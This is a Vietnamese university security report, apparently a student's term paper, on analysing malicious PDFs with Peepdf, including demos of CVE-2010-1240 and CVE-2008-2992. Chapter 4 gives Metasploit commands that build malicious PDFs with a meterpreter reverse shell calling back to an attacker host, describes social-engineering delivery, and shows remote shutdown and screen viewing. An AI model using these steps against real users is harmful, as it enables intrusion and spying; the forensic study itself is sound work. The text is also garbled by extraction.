HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THÔNG TIN I -& - HỌC PHẦN: AN TOÀN MẠNG BÁO CÁO CUỐI KỲ Đề tài: Tìm hiểu cơng cụ phân tích Peepdf Giảng viên: Họ tên: Mã sinh viên: Lớp: Nhóm mơn học: TS Đặng Minh Tuấn Vũ Tiến Thành B18DCAT237 D18CQAT01-B 01 Hà Nội, 2021 LỜI CẢM ƠN Em xin gửi lời cảm ơn chân thành tới thầy Đặng Minh Tuấn tận tâm hướng dẫn cho em kiến thức thời gian làm tập lớn Nhờ hướng dẫn thầy, em có thêm nhiều kiến thức bổ ích để hồn thành đề tài cách hồn chỉnh Tuy nhiên, q trình làm báo cáo em khơng tránh sai sót q trình làm bài, em mong thầy thơng cảm góp ý với em Em xin chân thành cảm ơn thầy! MỤC LỤC BẢNG THUẬT NGỮ VIẾT TẮT DANH MỤC HÌNH VẼ DANH MỤC BẢNG BIỂU LỜI MỞ ĐẦU CHƯƠNG 1: TỔNG QUAN VỀ FORENSICS 1.1 Forensics 1.2 Mục đích 1.3 Đặc điểm Forensics 1.4 Đối tượng nhắm đến Forensics 1.5 Quy trình Forensics CHƯƠNG 2: ĐỊNH DẠNG PDF 2.1 Định dạng PDF 2.2 Các mối đe doạ sử dụng file PDF 10 2.3 Lỗ hổng trình đọc tập tin PDF 12 CHƯƠNG 3: CÔNG CỤ PEEPDF 14 3.1 Giới thiệu công cụ Peepdf 14 3.2 Hướng dẫn cài đặt 15 3.3 Hướng dẫn sử dụng 17 CHƯƠNG 4: DEMO THỰC NGHIỆM 18 4.1 Demo 1: Lỗ hổng Adobe PDF Embedded EXE (CVE-2010-1240) 18 4.1.1 Mô tả 18 4.1.2 Khởi tạo phân tích file PDF chứa lỗ hổng 19 4.1.3 Kết luận 25 4.1.4 Khai thác lỗ hổng 25 4.2 Demo 2: Lỗ hổng Adobe util.printf() Buffer Overflow (CVE-2008-2992) 26 4.2.1 Mô tả 26 4.2.2 Khởi tạo phân tích file PDF chứa lỗ hổng 27 4.2.3 Kết luận 33 4.2.4 Khai thác lỗ hổng 33 CHƯƠNG 5: KẾT LUẬN 36 TÀI LIỆU THAM KHẢO 37 BẢNG THUẬT NGỮ VIẾT TẮT Từ viết tắt PDF Tiếng anh Common Vulnerabilities and Exposures Portable Document Format Tiếng việt Danh sách lỗ hổng bảo mật máy tính công khai Định dạng Tài liệu Di động RAM Random Access Memory Bộ nhớ truy cập ngẫu nhiên RCE Remote Code Execution Thực thi code từ xa TCP Transmission Control Protocol Giao thức điều khiển vận chuyển URL Uniform Resource Locator Định vị tài nguyên thống CVE DANH MỤC HÌNH VẼ Hình 1.1 Minh hoạ Forensics Hình 1.2 Các loại Forensics Hình 1.3 Các bước Forensics Hình 2.1 Minh hoạ file PDF Hình 2.2 Các phương thức phổ biến phần mềm mã độc xâm nhập vào hệ thống theo báo cáo F- Secure 10 Hình 2.3 Các định dạng file đính kèm email phát tán mã độc phổ biến năm 2020 11 Hình 2.4 Lỗ hổng trình đọc PDF Foxit Reader 12 Hình 2.5 Lỗ hổng Foxit Reader CVE-2021-34836 13 Hình 3.1 Trang Github để tải công cụ PeePDF 15 Hình 3.2 Giao diện PeePDF 16 Hình 4.1 Hộp thoại cảnh báo mở file PDF chứa lỗ hổng 18 Hình 4.2 Chạy metasploit framework sử dụng câu lệnh msfconsole 19 Hình 4.3 Tìm kiếm module theo tên lỗ hổng 20 Hình 4.4 File PDF chứa lỗ hổng tạo thành công 21 Hình 4.5 File PDF evi.pdf mở chế độ console 21 Hình 4.6 Nội dung object 22 Hình 4.7 Nội dung object 22 Hình 4.8 Nội dung object 22 Hình 4.9 Nội dung object 23 Hình 4.10 Nội dung object 23 Hình 4.11 Nội dung object 24 Hình 4.12 Nội dung object 10 24 Hình 4.13 Sử dụng module exploit/multi/handler 25 Hình 4.14 Cấu hình LHOST payload cho module cơng 25 Hình 4.15 Máy Kali lắng nghe kết nối TCP từ máy nạn nhân 25 Hình 4.16 Câu lệnh shutdown -s khiên máy nạn nhân bị tắt nguồn 26 Hình 4.17 Chạy metasploit framework sử dụng câu lệnh msfconsole 27 Hình 4.18 Tìm kiếm module theo tên lỗ hổng 28 Hình 4.19 File PDF chứa lỗ hổng tạo thành công 29 Hình 4.20 File PDF msf.pdf mở chế độ console 30 Hình 4.21 Nội dung object 31 Hình 4.22 Nội dung object 31 Hình 4.23 Nội dung object 32 Hình 4.24 Tóm tắt nội dung đoạn mã Javascript Object 32 Hình 4.25 Sử dụng module exploit/multi/handler 33 Hình 4.26 Cấu hình LHOST payload cho module công 33 Hình 4.27 Máy Kali lắng nghe kết nối TCP từ máy nạn nhân 34 Hình 4.28 Dùng lệnh screenshare để xem trực tuyến hình máy nạn nhân 34 Hình 4.29 Xem trực tuyến hình hiển thị máy nạn nhân 35 DANH MỤC BẢNG BIỂU Bảng 3.1 Các lệnh công cụ Peepdf 17 LỜI MỞ ĐẦU Trong lĩnh vực an tồn thơng tin, Computer Forensics hay cịn gọi điều tra số công việc phát hiện, bảo vệ phân tích thơng tin lưu trữ, truyền tải tạo máy tính mạng máy tính, nhằm đưa suy luận hợp lý để tìm ngun nhân, giải thích tượng q trình điều tra Khái niệm Forensics (Forensic Science – khoa học pháp y) tên gọi xuất phát từ lĩnh vực y tế từ kỷ 18 liên quan đến điều tra pháp y Ngày Forensics mở rộng nhiều lĩnh vực khác Computer Forensics đời vào năm 1980 phát triển máy tính cá nhân, xảy trộm cắp thiết bị phần cứng, mát liệu, vi phạm quyền, virus máy tính phá hoại… Các doanh nghiệp phủ nước ý thức vấn đề bảo mật Từ loạt sau, dùng từ Forensics người hiểu nói Computer Forensics [1] Nếu bạn chủ nhân website đấy, ngày đẹp trời website bạn bị hacker ghé thăm để lại hậu không mong muốn Bạn muốn xác định nguyên nhân bị cơng, tìm cách khắc phục để việc khơng tái diễn hay xa xác định thủ phạm Đó lúc bạn cần đến Forensics Đấy ví dụ điển hình, ngồi cịn trường hợp khác để phát mã độc máy tính, kiểm tra bất thường mạng, phát xâm nhập… Nói chung Forensics giúp xác định nguyên nhân cố đưa biện pháp giải Nói Forensics khơng thể khơng nhắc đến ngun tắc kinh điển khoa học điều tra Mục tiêu cốt lõi Computer Forensic phát hiện, bảo quản, khai thác, tài liệu hóa đưa kết luận liệu thu thập Cần lưu ý liệu phải đảm bảo tính xác thực, lấy mà không bị hư hại, không liệu khơng cịn ý nghĩa [1] Trong báo cáo nghiên cứu công cụ Forensic mạnh Kali Linux PeePDF CHƯƠNG 1: TỔNG QUAN VỀ FORENSICS 1.1 Forensics Trong lĩnh vực an tồn thơng tin, Forensics hay cịn gọi điều tra số công việc phát hiện, bảo vệ phân tích thơng tin lưu trữ, truyền tải tạo máy tính mạng máy tính, nhằm đưa suy luận hợp lý để tìm ngun nhân, giải thích tượng q trình điều tra Khái niệm Forensics (Forensic Science – khoa học pháp y) tên gọi xuất phát từ lĩnh vực y tế từ kỷ 18 liên quan đến điều tra pháp y Ngày Forensics mở rộng nhiều lĩnh vực khác Forensics đời vào năm 1980 phát triển máy tính cá nhân, xảy trộm cắp thiết bị phần cứng, mát liệu, vi phạm quyền, virus máy tính phá hoại… Các doanh nghiệp phủ nước ý thức vấn đề bảo mật 1.2 Mục đích Mục đích cốt lõi phát hiện, bảo quản, khai thác, tài liệu hóa đưa kết luận liệu thu thập Các trường hợp cần điều tra số:  Khi hệ thống bị công, chưa xác định nguyên nhân  Khi cần khôi phục liệu thiết bị, hệ thống  Hiểu rõ cách làm việc hệ thống  Điều tra tội phạm liên quan đến công nghệ cao  Điều tra hoạt động gián điệp công nghệ Việc tiến hành điều tra số nhằm xác định xác hoạt động mà tội phạm mạng tác động vào hệ thống ngăn ngừa rủi ro khác xảy Khơi phục thiệt hại mà cơng vào hệ thống mạng máy tính gây ra: phục hồi liệu, thông tin lưu trữ hệ thống bị phá hoại có chủ đích Hình 1.1 Minh hoạ Forensics 1.3 Đặc điểm Forensics Forensics có số đặc điểm sau:  Dữ liệu cần phân tích lớn, liệu text thơi với dung lượng vài MB có lượng thơng tin lớn Trong thực tế cịn khổng lồ  Dữ liệu thường khơng cịn nguyên vẹn, bị thay đổi, phân mảnh, bị lỗi  Bảo quản liệu khó khăn, liệu thu có tính tồn vẹn cao, thay đổi nhỏ làm ảnh hưởng đến tất  Dữ liệu forensics gồm nhiều loại khác nhau: file hệ thống, ứng dụng,…  Vấn đề cần forensics trừu tượng: mã máy, dump file, network packet…  Dữ liệu dễ dàng bị giả mạo  Xác định tội pham khó khăn, bạn tìm liệu hacker (IP, email, profile…) để xác định được đối tượng thật ngồi đời khơng đơn giản 1.4 Đối tượng nhắm đến Forensics Forensic thường làm việc với đối tượng sau:  Physical Media, Media Management: Liên quan đến phần cứng, tổ chức phân vùng, phục hồi liệu bị xóa… Thu thập phân tích liệu thiết bị vật lý, trích xuất liệu ẩn, khơi phục liệu bị xóa, qua tìm người tạo làm thay đổi liệu Là loại hình điều tra thực thiết bị di động, GPS, máy tính bảng,… nhằm thu thập liệu, chứng kỉ thuật số  File System: Phân tích file hệ thống, hệ điều hành Windows, Linux, Android…  Application: Phân tích liệu từ ứng dụng file log, file cấu hình, reverse ứng dụng… Phân tích ứng dụng chạy hệ thống Email, Skype, Yahoo, trình duyệt Qua trích xuất ghi lưu trữ ứng dụng, phục vụ cho việc tìm chứng  Network: Phân tích gói tin mạng, bất thường mạng thực giám sát, phân tích lưu lượng mạng nhằm phục vụ cho việc phát bất thường mạng, thu thập thông tin phục vụ cho việc tìm kiếm chứng  Memory: Phân tích liệu nhớ, thường liệu lưu RAM dump Thực trích xuất, phân tích nhớ RAM, để tìm hành vi hệ thống Những tập tin thực thi chứng minh hành động phạm tội tội phạm Hình 1.2 Các loại Forensics Các cơng cụ pháp y số khơng có giá trị việc thu thập thơng tin mà cịn để tự động hóa phần lớn quy trình phân tích, chẳng hạn như:  Xác định khôi phục đoạn tệp tệp thư mục bị ẩn bị xóa từ vị trí (ví dụ: dung lượng sử dụng, dung lượng trống, không gian chung)  Kiểm tra cấu trúc tệp, tiêu đề đặc điểm khác để xác định loại liệu mà tệp chứa, thay dựa vào phần mở rộng tệp (ví dụ: doc, jpg, mp3)  Hiển thị nội dung tất tệp đồ họa  Thực tìm kiếm phức tạp - Theo đó, object chứa mô tả file nhúng vào file PDF, đó, tên file template.pdf Trong object cịn chứa object Ta tiếp tục xem nội dung object sử dụng câu lệnh: object Hình 4.9 Nội dung object Hình 4.10 Nội dung object 23 - Ta suy luận, object tạo kết nối đến máy kể công - Ta tiếp tục phân tích object đáng ngờ theo cú pháp: object Hình 4.11 Nội dung object - Object gọi hàm exportDataObject({ cName: "template", nLaunch: }) Trong đó, cName tên file export template, nLaunch: khiến file export lưu vào máy Từ đó, ta kết luận, object export file template lưu vào máy nạn nhân - Ta tiếp tục phân tích object đáng ngờ 10 theo cú pháp: object 10 Hình 4.12 Nội dung object 10 - Theo đó, object 10 truy cập vào đường dẫn c:\windows\system32 chạy cmd.exe Ngồi ra, object thị dialog có nội dung hình - Khi nạn nhân ấn Open, object 10 truy cập vào đường dẫn chứa file template.pdf mở file 24 4.1.3 Kết luận - Khi nạn nhân mở file PDF chứa lỗ hổng evil.pdf, object kích hoạt hiển thị hình xác nhận có lưu file template.pdf nhúng file evil.pdf hay không - Sau người dùng bấm Save, object 10 truy cập vào đường dẫn c:\windows\system32 chạy ngầm cmd.exe Object hiển thị cho nạn nhân dialog cảnh báo - Nếu nạn nhân ấn Open tiếp object 10 truy cập vào đường dẫn chứa file template.pdf mở file - Khi đó, object file template.pdf tạo kết nối đến máy kẻ cơng Từ đó, kẻ cơng điều khiển máy nạn nhân từ xa lệnh cmd 4.1.4 Khai thác lỗ hổng - Đầu tiên, ta tạo file PDF chứa mã độc theo bước mục 4.1.2.1 - Ở máy công Kali, ta sử dụng module exploit/multi/handler để thực lắng nghe tín hiệu kết nối, trả từ máy nạn nhân nạn nhân mở file PDF chứa mã độc: Hình 4.13 Sử dụng module exploit/multi/handler - Tiếp theo, ta cấu hình payload LHOST theo câu lệnh sau: set LHOST 192.168.100.14 set payload payload/windows/meterpreter/reverse_tcp Hình 4.14 Cấu hình LHOST payload cho module công - Sau exploit, máy Kali lắng nghe kết nối trả từ máy nạn nhân nạn nhân mở file PDF chứa mã độc Hình 4.15 Máy Kali lắng nghe kết nối TCP từ máy nạn nhân 25 - Tiếp theo, sử dụng kĩ thuật Social Engineering để gửi file PDF chứa mã độc sang máy nạn nhân khiến nạn nhân mở file PDF chứa mã độc - Ở máy nạn nhân, nạn nhân mở file PDF chứa mã độc cửa sổ hiển hỏi người dùng có muốn lưu file template.pdf hay không - Khi nạn nhân ấn Save, dialog cảnh báo - Khi người dùng ấn Open, máy nạn nhân thiết lập kết nối đến máy Kali kẻ công - Từ đó, kẻ cơng thực thi lệnh cmd để điều khiển từ xa máy nạn nhân - Ví dụ ta tắt nguồn máy nạn nhân sử dụng câu lệnh sau: shutdown -s Hình 4.16 Câu lệnh shutdown -s khiên máy nạn nhân bị tắt nguồn 4.2 Demo 2: Lỗ hổng Adobe util.printf() Buffer Overflow (CVE-2008-2992) Video demo: https://youtu.be/oTT88o8E4rc 4.2.1 Mô tả Lỗ hổng Adobe util.printf() Buffer Overflow (CVE-2008-2992) nhắm vào phần mềm Adobe Reader với phiên 8.1.2 trở trước hệ điều hành Windows MacOS Theo đó, lỗ hổng tràn nhớ đệm stack-based cho phép kẻ cơng từ xa thực thi đoạn mã thông qua file PDF File PDF chứa đoạn mã Javascript gọi đến hàm util.printf(), có tham số đầu vào string định dạng thủ cơng 26 4.2.2 Khởi tạo phân tích file PDF chứa lỗ hổng 4.2.2.1 Khởi tạo - Đầu tiên, ta chạy metasploit framework sử dụng câu lệnh: msfconsole Hình 4.17 Chạy metasploit framework sử dụng câu lệnh msfconsole 27 - Sử dụng câu lệnh sau để tìm kiếm module theo tên lỗ hổng: search name:Adobe util.printf() Buffer Overflow Hình 4.18 Tìm kiếm module theo tên lỗ hổng 28 - Sử dụng module #1 để tiến hành khởi tạo file PDF chứa lỗ hổng - Lần lượt chạy câu lệnh sau để cấu hình địa máy để lắng nghe, cổng để lắng nghe payload cho module: set LHOST 192.168.100.14 set LPORT 4444 set payload windows/meterpreter/reverse_tcp exploit - Sau chạy lệnh exploit, file PDF có tên msf.pdf chứa lỗ hổng khởi tạo folder có đường dẫn: /root/.msf4/local Hình 4.19 File PDF chứa lỗ hổng tạo thành cơng 29 4.2.2.2 Phân tích file PDF chứa lỗ hổng sử dụng PeePDF - Đầu tiên, ta chuyển file PDF chứa mã độc hình Desktop - Ta mở folder chứa công cụ PeePDF chạy dòng lệnh sau để mở file PDF chứa mã độc msf.pdf chế độ console công cụ: python2 peepdf.py -i /root/Desktop/msf.pdf Hình 4.20 File PDF msf.pdf mở chế độ console 30 - Ta thấy, phần Suspicious elements, có xuất mã Javascript object object sử dụng hàm util.printf() ghi nhận lỗ hổng CVE2008-2992 Ta kiểm tra nội dung object phần Suspicious elements - Ta sử dụng câu lệnh sau để kiểm tra object đáng ngờ 1: object Hình 4.21 Nội dung object - Object khai báo Outline, pages hành động thực mở file PDF, hành động nêu rõ object - Ta tiếp tục kiểm tra nội dung object sử dụng câu lệnh: object Hình 4.22 Nội dung object - Object gọi hàm Javascript Object file PDF mở - Ta tiếp tục kiểm tra nội dung object sử dụng câu lệnh: object 31 Hình 4.23 Nội dung object - Ta thấy, nội dung đoạn mã Javascript object dài khó hiểu - Do đó, ta tóm tắt nội dung đoạn mã hình sau: Hình 4.24 Tóm tắt nội dung đoạn mã Javascript Object - Từ hình trên, ta thấy luồng code chạy sau:  Khởi tạo var1 chứa payload  Khởi tạo var2 chứa NOP sled  Thêm payload vào sau NOP sled lưu vào biến var4 32  Từ var5  var10, ta khởi tạo Heap Spray phân bố payload nhớ theo chu kì  Ở dịng lệnh cuối cùng, ta thấy hàm util.printf() gọi Hàm in số dạng số thập phân, với phần nguyên gồm 4500 chữ số phần phần thập phân gồm 4500 chữ số Việc làm tràn nhớ đệm, khiến kẻ cơng thực đoạn code mà nạp vào payload trước 4.2.3 Kết luận - Khi nạn nhân mở file PDF chứa mã độc msf.pdf, object kích hoạt chạy đoạn mã Javascript object - Object khởi tạo payload phân bổ payload nhớ theo chu kỳ cố định gọi hàm util.printf() gây tràn nhớ đệm - Từ đó, kẻ cơng thực đoạn mã mà nạp vào payload trước 4.2.4 Khai thác lỗ hổng - Đầu tiên, ta tạo file PDF chứa mã độc theo bước mục 4.2.2.1 - Ở máy công Kali, ta sử dụng module exploit/multi/handler để thực lắng nghe tín hiệu kết nối, trả từ máy nạn nhân nạn nhân mở file PDF chứa mã độc: Hình 4.25 Sử dụng module exploit/multi/handler - Tiếp theo, ta set payload LHOST theo câu lệnh sau: set LHOST 192.168.100.14 set payload payload/windows/meterpreter/reverse_tcp Hình 4.26 Cấu hình LHOST payload cho module công 33 - Sau exploit, máy Kali lắng nghe kết nối TCP trả từ máy nạn nhân nạn nhân mở file PDF chứa mã độc Hình 4.27 Máy Kali lắng nghe kết nối TCP từ máy nạn nhân - Tiếp theo, sử dụng kĩ thuật Social Engineering để gửi file PDF chứa mã độc sang máy nạn nhân khiến nạn nhân mở file PDF chứa mã độc - Ở máy nạn nhân, nạn nhân mở file PDF chứa mã độc, nhớ đệm bị tràn kết nối đến máy kẻ công thiết lập - Khi đó, kẻ cơng thực đoạn mã để điều khiến từ xa máy nạn nhân - Ví dụ ta xem trực tuyến hình máy nạn nhân sử dụng câu lệnh sau: screenshare Hình 4.28 Dùng lệnh screenshare để xem trực tuyến hình máy nạn nhân 34 Hình 4.29 Xem trực tuyến hình hiển thị máy nạn nhân 35 CHƯƠNG 5: KẾT LUẬN Pháp y kỹ thuật số khái niệm mẻ Việt Nam Mặc dù có số trung tâm cung cấp dịch vụ điều chưa chuyên sâu Đi với tình hình phát triển ngày nhanh thời đại 4.0 nước ta, cơng hacker ngày tinh vi khó nắm bắt Việc phát triển thông thạo pháp y kỹ thuật số cách tay đắc lực nhằm điều tra tội phạm mạng, đưa chứng thép giúp cho việc đưa kẻ phạm tội phải chịu trừng phạt thích đáng Nhu cầu truy vết tìm tội phạm mạng hứa hẹn toán buộc phải giải dành cho quan tổ chức lẫn doanh nghiệp Đây hội nghề nghiệp lớn mở cho sinh viên chuyên ngành công nghệ thông tin chưa định hướng tương lai Trong báo cáo, em trình bày cách sử dụng cơng cụ PeePDF - cơng cụ phân tích mã nguồn nhằm kiểm tra sàng lọc mối đe doạ tệp tin định dạng PDF Trong hai demo, em sử dụng file PDF chứa đoạn mã độc lỗ hổng CVE công bố, việc khởi chạy file giúp kẻ cơng có quyền kiểm sốt theo dõi máy tính nạn nhân, từ dẫn tới nguy cơng RCE (Remote Code Execution – Thực thi mã từ xa) Để giảm thiểu hậu lỗ hổng lỗ hổng tương tự xảy ra, việc khởi chạy file PDF, đặc biệt file đính kèm email, đường dẫn, liên kết lạ cần thận trọng Người dùng nên cập nhật vá lỗi cho ứng dụng máy tính; hệ điều hành sở liệu chương trình bảo vệ máy tính thường xuyên để hạn chế việc khai thác lỗ hổng bảo mật 36 TÀI LIỆU THAM KHẢO [1] Ping, "WhiteHat," 17 2014 [Online] Available: https://whitehat.vn/threads/forensic-1-tong-quan-ve-computer-forensics.1082/ [Accessed 15 12 2021] [2] X Linh, "Quantrimang," 10 12 2021 [Online] Available: https://quantrimang.com/tim-hieu-ve-dinh-dang-pdf-118417 [Accessed 15 12 2021] [3] N Hằng, "Tìm việc 365," 2019 [Online] Available: https://timviec365.vn/blog/file-pdf-la-gi-new5025.html [Accessed 15 12 2021] [4] M Hypponen, "Attack Landscape Update," F-Secure, Finland, 2020 [5] J M Esparza, "https://github.com/jesparza/peepdf," 18 11 2016 [Online] Available: https://github.com/jesparza/peepdf [Accessed 15 12 2021] [6] D Lukan, "Protean Security," 26 10 2012 [Online] Available: https://www.proteansec.com/exploit-development/hacking-pdf-part-2/ [Accessed 15 12 2021] [7] D Lukan, "Infosec," 2019 [Online] Available: https://resources.infosecinstitute.com/topic/hacking-pdf-part-1/ [Accessed 15 12 2021] [8] R Adams and G A Mann, "The Advanced Data Acquisition Model (Adam): A Process Model for Digital," 2013 [Online] Available: https://www.researchgate.net/publication/313958414_The_Advanced_ Data_Acquisition_Model_Adam_A_Process_Model_for_Digital_Forensic_Practice [Accessed 15 12 2021] [9] G Williams, "Weaponised PDFs," England, 2018 37 ... 13 CHƯƠNG 3: CÔNG CỤ PEEPDF 3.1 Giới thiệu công cụ Peepdf PeePDF công cụ viết ngơn ngữ Python để phân tích tệp PDF để xác định xem tệp có chứa liệu độc hại hay khơng Mục đích cơng cụ nhằm cung... khơng cịn tích hợp sẵn cơng cụ PeePDF, ta phải tải cài đặt công cụ Github thơng qua đường link: https://github.com/jesparza /peepdf Hình 3.1 Trang Github để tải công cụ PeePDF 15 Sau tải công cụ máy... việc tìm chứng  Network: Phân tích gói tin mạng, bất thường mạng thực giám sát, phân tích lưu lượng mạng nhằm phục vụ cho việc phát bất thường mạng, thu thập thông tin phục vụ cho việc tìm kiếm